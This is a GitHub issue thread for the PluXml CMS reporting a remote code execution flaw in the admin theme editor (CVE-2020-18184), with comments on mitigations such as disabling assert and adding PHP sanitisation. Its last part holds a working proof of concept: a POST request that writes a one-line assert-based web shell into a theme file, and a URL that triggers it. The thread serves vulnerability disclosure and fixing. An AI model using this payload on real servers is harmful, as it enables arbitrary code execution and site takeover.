-
-
Notifications
You must be signed in to change notification settings - Fork 66
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
An issue in the theme edit function #320
Comments
Hello, |
You can disable the assert evaluation in php.ini. |
assert_options(ASSERT_ACTIVE,false); dans le début du fichier index.php ? |
Des news ? |
In fact, I think it’s not a good idea for webadmin to be able to edit .php file directly. |
Hello, it appears CVE-2020-18184 has been assigned to this issue. However, the documentation seems to include a lot of instructions for how to execute arbitrary code in themes:
https://wiki.pluxml.org/developper/developpement/ The examples even make extensive use of Is this working as intended? Thanks |
A new function plxUtils::sanitizePhp is added to PluXml Of course, it's better to disable these critical function in php.ini. |
The theme edit function /PluXml/core/admin/parametres_edittpl.php allows remote attackers to execute arbitrary PHP code by placing this code into a template.
Poc:
![image](https://user-images.githubusercontent.com/9081952/52915299-24698f80-330d-11e9-88d4-796c2bca6205.png)
/PluXml/core/admin/parametres_edittpl.php [POST]token=603b37bed4a91d8b18a3507c46ae27df644a2ff4&template=%2Ftags.php&submit=Save+the+file&tpl=%2Ftags.php&content=%3C%3Fphp+assert%28%24_REQUEST%5B%27c%27%5D%29%3B%3F%3E%0D%0A
then visit /PluXml/themes/defaut/tags.php?c=phpinfo();
The text was updated successfully, but these errors were encountered: